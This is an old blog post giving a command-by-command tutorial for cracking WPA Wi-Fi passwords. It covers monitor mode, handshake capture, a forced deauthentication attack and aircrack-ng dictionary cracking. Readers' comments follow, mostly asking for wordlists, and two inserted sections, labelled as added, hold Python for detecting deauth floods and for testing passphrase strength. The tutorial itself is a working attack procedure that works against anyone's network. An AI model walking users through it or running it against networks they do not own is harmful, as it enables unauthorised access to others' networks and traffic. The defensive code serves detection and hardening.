WPA Wireless Hacking
by Josh Houston on Mar.11, 2010, under Hacking, Security, Tips & Tricks, Uncategorized, Wireless
In this video tutorial, I show you how to crack a wireless network secured with WPA encryption. Although it may sound hard, it is actually easier than you may think. I have also provided a written tutorial for you to save, and the video is also available for download. The following are links to an outside website (mediafire) providing hosting for the videos.
- Type in "airmon-ng" to see the wireless adaptors on your computer.
- You should see a listing come up. Mine showed wlan0. Yours may be different, such as rausb0.
- Type in "airmon-ng start wlan0" to start your wireless device. Replace "wlan0" with whatever yours showed. This will create a new "virtual" device and will show its name. The name for mine was "mon0".
- Open a new terminal window and type "airodump-ng mon0", again replacing "mon0" with your new virtual device's name.
You will begin to see a listing of different APs (access points). Find the one you want and press Control + C. Pressing Control + C cancels the program currently running in the terminal. The names of the networks found are under the ESSID column. You may not see anything there, which is fine; some of them are hidden. Home.net is the name of my network, which is the ESSID.
- This is what I typed after that: "airodump-ng -c 6 -w Home.netWPA --output-format ivs mon0". This is all real easy stuff, so I'll just explain it to you right quick. airodump-ng is the program that will capture the WPA handshake, which we will need in order to run a dictionary attack on it. Here goes!
- Type "airodump-ng"
- Add a space and type "--channel 6" (the short form "-c 6" is what I typed above), replacing the number 6 with the channel number of your network (although 6 is VERY common, so don't be surprised if that is it)
- Add a space and type "-w Home.netWPA", replacing Home.netWPA with the name of your network, or something you can remember.
- Add a space and type "--output-format ivs". This tells airodump-ng to save our file in the ivs format, which we will use later for cracking.
- The "mon0" at the end simply defines which device to use.
- Open a new terminal window. In it, type "aireplay-ng -0 1 -e Home.net mon0"
- aireplay-ng is the tool that is going to allow us to perform the deauthentication attack, which will be needed in order to successfully crack the password.
- The "-0 1" flag tells the program to perform the deauthentication attack on a station, rather than all clients, which can really slow down progress.
- The "-e Home.net" tells it which address to attack. The -e stands for ESSID, which is the address of your network. So you will have to replace Home.net with the address of your network (the one that I recommended you write down or copy earlier).
- The "mon0" at the end again just defines which device to use.
- In our airodump-ng window, if you have not already, press Control + C, and type: "aircrack-ng -w list.lst Home.netWPA-01.ivs".
This is the last step in our attack: cracking the password against our dictionary list. Here goes:
- aircrack-ng is going to allow us to take the captured WPA handshake, and will use our ESSID along with every entry in our dictionary list to try and "guess" the password.
- The "-w list.lst" tells aircrack-ng which dictionary file to use. If you are using Backtrack 4, then you can just place the dictionary list on your desktop and replace list.lst with your file name.
- And lastly, "Home.netWPA-01.ivs" instructs aircrack-ng to attempt to crack this file.
- If all goes well, the password was in your password list, and you now have the password to your network! Congratulations! Now.... Go make a password that isn't in a dictionary....
- E-mail me about donating to keep this blog up.
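The deauthentication step above (aireplay-ng -0) is exactly what a wireless IDS is built to notice: a burst of deauth frames for one BSSID, usually addressed to the broadcast address so every client drops, followed by clients re-authenticating and running the 4-way handshake again. The script below is an added example written for this page, not code from the post or from the aircrack-ng project. It reads a constructed, simplified frame log (one frame per line: timestamp, subtype, source, destination, BSSID; the addresses are placeholders made up for the example) and raises one alert per burst. The threshold, window and rejoin values are assumed policy settings, not anything the post specifies.

```python
from collections import defaultdict, deque

DEAUTH_THRESHOLD = 5   # deauth frames per BSSID inside the window before alerting (assumed policy value)
WINDOW_SECONDS = 2.0   # sliding window length in seconds (assumed)
REJOIN_SECONDS = 10.0  # a re-authentication this soon after a burst is treated as a forced handshake (assumed)
BROADCAST = "ff:ff:ff:ff:ff:ff"
HANDSHAKE_SUBTYPES = {"auth", "assoc-req", "reassoc-req", "eapol"}

# Constructed sample log, one frame per line: "epoch_seconds subtype src dst bssid".
# Addresses are placeholders. The burst on ...aa:01 imitates a broadcast deauth followed by
# a client rejoining; the single deauth on ...aa:02 is ordinary traffic and must not alert.
SAMPLE_LOG = """\
1268300000.000 beacon 02:00:00:00:aa:01 ff:ff:ff:ff:ff:ff 02:00:00:00:aa:01
1268300000.500 data 02:00:00:00:cc:01 02:00:00:00:aa:01 02:00:00:00:aa:01
1268300001.000 deauth 02:00:00:00:aa:01 ff:ff:ff:ff:ff:ff 02:00:00:00:aa:01
1268300001.060 deauth 02:00:00:00:aa:01 ff:ff:ff:ff:ff:ff 02:00:00:00:aa:01
1268300001.120 deauth 02:00:00:00:aa:01 ff:ff:ff:ff:ff:ff 02:00:00:00:aa:01
1268300001.180 deauth 02:00:00:00:aa:01 ff:ff:ff:ff:ff:ff 02:00:00:00:aa:01
1268300001.240 deauth 02:00:00:00:aa:01 ff:ff:ff:ff:ff:ff 02:00:00:00:aa:01
1268300001.300 deauth 02:00:00:00:aa:01 ff:ff:ff:ff:ff:ff 02:00:00:00:aa:01
1268300002.000 auth 02:00:00:00:cc:01 02:00:00:00:aa:01 02:00:00:00:aa:01
1268300002.100 assoc-req 02:00:00:00:cc:01 02:00:00:00:aa:01 02:00:00:00:aa:01
1268300002.200 eapol 02:00:00:00:aa:01 02:00:00:00:cc:01 02:00:00:00:aa:01
1268300060.000 deauth 02:00:00:00:aa:02 02:00:00:00:cc:09 02:00:00:00:aa:02
"""


def parse_line(line: str) -> dict:
    """Split one log line into its fields; raises ValueError on a malformed line."""
    ts, subtype, src, dst, bssid = line.split()
    return {"ts": float(ts), "subtype": subtype,
            "src": src.lower(), "dst": dst.lower(), "bssid": bssid.lower()}


def detect_deauth_floods(lines, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Return one alert per burst of >= threshold deauth frames for a BSSID inside `window` seconds.

    Each alert records the burst size, whether it was sent to the broadcast address
    (every client at once) and whether a client began re-authenticating shortly
    afterwards, which is the condition the handshake-capture step depends on.
    """
    recent = defaultdict(deque)  # bssid -> timestamps of deauth frames still inside the window
    active = {}                  # bssid -> alert for the burst currently in progress
    alerts = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        f = parse_line(line)
        b = f["bssid"]
        if f["subtype"] == "deauth":
            q = recent[b]
            q.append(f["ts"])
            while f["ts"] - q[0] > window:
                q.popleft()
            if b in active and f["ts"] - active[b]["last_ts"] > window:
                del active[b]  # the earlier burst has ended; a later flood gets its own alert
            if b in active:
                active[b]["count"] += 1
                active[b]["last_ts"] = f["ts"]
            elif len(q) >= threshold:
                active[b] = {"bssid": b, "first_ts": q[0], "last_ts": f["ts"], "count": len(q),
                             "broadcast": f["dst"] == BROADCAST, "rejoin_after": False}
                alerts.append(active[b])
        elif (f["subtype"] in HANDSHAKE_SUBTYPES and b in active
              and f["ts"] - active[b]["last_ts"] <= REJOIN_SECONDS):
            active[b]["rejoin_after"] = True
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample log this yields a single alert for 02:00:00:00:aa:01 with six frames, flagged as broadcast and followed by a rejoin; the lone deauth on the other BSS stays below the threshold. Genuine access points do send occasional deauth frames, so the rate and the broadcast destination together, not any single frame, are what make the pattern worth alerting on.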
March 12th, 2010 on 4:34 am
Hi.. when I type airmon-ng in the console it doesn't show any wireless cards available... but I have a DELL laptop with a wireless card... do I need to install any drivers to make it active, or am I missing any commands to activate it?
pls tell
March 14th, 2010 on 11:52 am
Thanks for everything, you're doing a great job. Can you please tell me where to find a word list which contains words from all languages, or at least from popular ones (English, French, Spanish, Dutch, Portuguese, Romanian, Italian, maybe Russian etc.)??? Or at least where to search for it... Thanks again and keep up the good work
March 23rd, 2010 on 5:56 pm
I am from Romania and I don't know English well, so I copy-paste:
"Thanks for everything, you're doing a great job. Can you please tell me where to find a word list which contains words from all languages, or at least from popular ones (English, French, Spanish, Dutch, Portuguese, Romanian, Italian, maybe Russian etc.)??? Or at least where to search for it... Thanks again and keep up the good work"
April 1st, 2010 on 7:36 am
Hi!
Can I have your dictionary list? Kindly send it to my email address?
darkbytes31@gmail.com
Thanks in advance!!
April 5th, 2010 on 1:30 am
Dear Josh,
Can you send me your dictionary list as well?
plimper@gmail.com
Regards
plimper
April 16th, 2010 on 11:31 pm
hi, I'm new here and I'm still trying to understand, except for the dictionary list.. can you send me a good dictionary list... thank you..
April 16th, 2010 on 11:31 pm
jarold_v@yahoo.com
April 20th, 2010 on 5:49 am
I'm also interested in your dictionary list. Please send it to doroft3i@yahoo.com .
Thanks a lot !
April 20th, 2010 on 8:51 pm
Recently I read the memoir of a boy soldier. What are some other books that talk about child labour, child soldiers etc. . . good books about human rights?
April 24th, 2010 on 12:04 pm
A bad penny always turns up.
April 28th, 2010 on 8:04 pm
It might be really difficult for a single mother at a young age to cope with the needs of her child. A lot has to be taken care of in bringing up the child, which includes the welfare of the child as well as managing one's own education. Moreover, it is really tough to lead a life alone after separating from the spouse.
April 29th, 2010 on 8:54 am
What an excellent blog!
May 6th, 2010 on 10:27 pm
I’m going to bookmark this so I can finish reading it later.
May 8th, 2010 on 12:14 am
ok so for the people who want the wordlist, follow these steps. You don't have to download it or anything, it is already saved in your BackTrack 4, so here we go..
1. Open Konqueror; it is the one with the earth picture... the second one on your menu
2. Once you open that, click "Home Folder"
3. Now press the up key. By the up key I mean the key that is pointing up, and it is blue
4. Now you will see a lot of blue folders. Find "pentest", click it and it will open
5. Now find the "passwords" folder and click it to open it
6. Now you will see another list of folders. Find "wordlist", and yes, that is the one with the wordlist .lst in it, so open that
7. Now you should see an .lst file; for me it is darkc0de.lst. Now you can drag it and copy it to your desktop and you're done........
8. Have a nice day :)
May 22nd, 2010 on 11:15 am
hello, can you send me the dictionary list and how to upload it to backtrack? thanks, email
nasser_q11@yahoo.com
May 26th, 2010 on 7:20 am
Hi. I have a question: if I know the WPA key, how do I use the key to decrypt the packets?
May 27th, 2010 on 12:42 am
How ya been Josh? Haven’t seen you in awhile.
To the dictionary crackers out there, a simple half hour of Googling will probably land you a wordlist of the entire Webster's dictionary in text document format. I know this because I used it to crack Kerb-Preauth hashes for password recovery. These are very, Very efficient for English users. However, I don't know about any other languages.
Happy Shelling,
Willie
June 10th, 2010 on 8:06 pm
ok now i’m stuck hahah exactly how? do you make so very much mobsters cause i only have seven ( which includes me! ) plus i dont think i am want to achieve higher in addition i’m lvl 19 and also acquiring better so how do i develop my own mafia quick from such a small level Or is this a site to question?
June 28th, 2010 on 4:22 am
Does WPA always need a dictionary? So if the password doesn't exist in the dictionary, we wouldn't be able to crack it? Is there another way to crack WPA without using a dictionary..?
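The comment above asks what happens when the passphrase is not in the wordlist. The attack described in the post works only when it is: aircrack-ng runs each list entry through PBKDF2-HMAC-SHA1 with the ESSID as the salt (4096 rounds, 256-bit output) and checks the result against the captured handshake, so a passphrase that no list contains is never produced. From the defender's side the practical check is therefore to test your own passphrase the way that attack would. The Python below is an added example for this page, not code from the post or from aircrack-ng. It uses a small constructed wordlist standing in for list.lst, `derive_pmk` shows the derivation against the "password"/"IEEE" test vector published in IEEE 802.11i Annex H, and `assess` reports whether a passphrase would fall to the wordlist and roughly how much entropy it has; the 60-bit floor is an assumed policy value.

```python
import hashlib
import math
import string

# Constructed stand-in for a cracking wordlist such as list.lst; real lists are far larger.
SAMPLE_WORDLIST = ["password", "letmein", "dragon", "sunshine", "football", "iloveyou"]

MIN_ENTROPY_BITS = 60  # assumed policy floor, not a value from the post


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal pairwise master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).

    The SSID is the salt. That is why aircrack-ng needs the ESSID next to the wordlist,
    and why a precomputed table of PMKs is only useful against one SSID.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def in_wordlist(passphrase: str, wordlist) -> bool:
    """True if the passphrase, ignoring case and any trailing digits or punctuation,
    is an entry in the wordlist. 'Sunshine123' therefore counts as 'sunshine'."""
    words = {w.strip().lower() for w in wordlist if w.strip()}
    lowered = passphrase.lower()
    base = lowered.rstrip(string.digits + string.punctuation)
    return lowered in words or base in words


def entropy_bits(passphrase: str) -> float:
    """Rough estimate: length * log2(size of the character classes used).
    This overestimates anything pattern-based, so treat it as an upper bound."""
    pool = 0
    if any(c.islower() for c in passphrase):
        pool += 26
    if any(c.isupper() for c in passphrase):
        pool += 26
    if any(c.isdigit() for c in passphrase):
        pool += 10
    if any(c in string.punctuation or c == " " for c in passphrase):
        pool += len(string.punctuation) + 1
    return len(passphrase) * math.log2(pool) if pool else 0.0


def assess(passphrase: str, ssid: str, wordlist=SAMPLE_WORDLIST) -> dict:
    """Report the weaknesses a wordlist attack would exploit for this passphrase and SSID."""
    problems = []
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        problems.append("WPA-Personal passphrases must be 8 to 63 ASCII characters")
    if in_wordlist(passphrase, wordlist):
        problems.append("passphrase (or its base word) is in the wordlist")
    if ssid.lower() in passphrase.lower():
        problems.append("passphrase contains the SSID, which every attacker already knows")
    bits = entropy_bits(passphrase)
    if bits < MIN_ENTROPY_BITS:
        problems.append(f"only about {bits:.0f} bits of entropy, below the {MIN_ENTROPY_BITS}-bit floor")
    return {"ok": not problems, "entropy_bits": round(bits, 1), "problems": problems}


if __name__ == "__main__":
    print(derive_pmk("password", "IEEE").hex())
    for candidate in ("sunshine", "Sunshine123", "Home.net2010", "Lk7#pQ2m!vR9zT4w"):
        print(candidate, assess(candidate, "Home.net"))
```

Run as a script it prints the Annex H PMK and then grades four candidates: the first three fail (in the wordlist, in the wordlist after stripping the digits, and built from the SSID), while the random 16-character one passes. The 4096-round derivation is deliberately slow, so the cost of the attack in the post is set entirely by how many candidates have to be tried; a passphrase outside any list and long enough to put that number out of reach is the mitigation.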
July 3rd, 2010 on 5:13 pm
There are plenty of ways to use single mother welfare.
July 7th, 2010 on 8:33 pm
Hello! When I open the 2nd konsole in WPA cracking for the command #aireplay-ng -0 1 -e .....
it only shows "no such bssid", but I followed all your commands. Can you help me please? God bless!
July 13th, 2010 on 5:43 pm
Can you please send me the dictionary list as well? thanks so much
July 14th, 2010 on 11:01 am
thanks for the lesson
I need a password list
^.^
July 20th, 2010 on 6:33 pm
Fantastic tutorials
Same as everyone else, any chance of mailing the dictionary file?
Thanks
Matt
July 28th, 2010 on 1:53 am
Dear Josh,
Can you send me your dictionary list?
thanks in advance,
ins_cyber@yahoo.com
September 27th, 2010 on 5:25 am
hey Josh, could you send me the dictionary list also please
send it to marcus1989@hotmail.co.uk
thanks dude